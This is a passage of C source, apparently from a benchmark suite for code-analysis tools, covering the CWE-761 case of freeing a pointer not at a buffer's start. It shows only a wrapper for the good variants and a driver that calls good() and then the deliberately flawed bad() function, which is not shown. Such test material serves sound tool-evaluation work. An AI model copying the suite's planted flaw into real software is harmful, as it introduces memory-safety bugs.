void CWE761_Free_Pointer_Not_at_Start_of_Buffer__char_environment_08_good()
{
    goodB2G1();
    goodB2G2();
}
#endif /* OMITGOOD */
/* Below is the main(). It is only used when building this testcase on
its own for testing or for building a binary to use in testing binary
analysis tools. It is not used when compiling all the testcases as one
application, which is how source code analysis tools are tested. */
#ifdef INCLUDEMAIN
/*
 * Stand-alone driver, compiled only when this test case is built as its
 * own binary (INCLUDEMAIN defined): runs the good variants and then the
 * bad one, bracketing each with progress output via printLine().
 */
int main(int argc, char * argv[])
{
    /* seed randomness */
    srand( (unsigned)time(NULL) );
#ifndef OMITGOOD
    printLine("Calling good()...");
    CWE761_Free_Pointer_Not_at_Start_of_Buffer__char_environment_08_good();
    printLine("Finished good()");
#endif /* OMITGOOD */
#ifndef OMITBAD
    printLine("Calling bad()...");
    CWE761_Free_Pointer_Not_at_Start_of_Buffer__char_environment_08_bad();
    printLine("Finished bad()");
#endif /* OMITBAD */
    return 0;
}
#endif
| {
"pile_set_name": "Github"
} |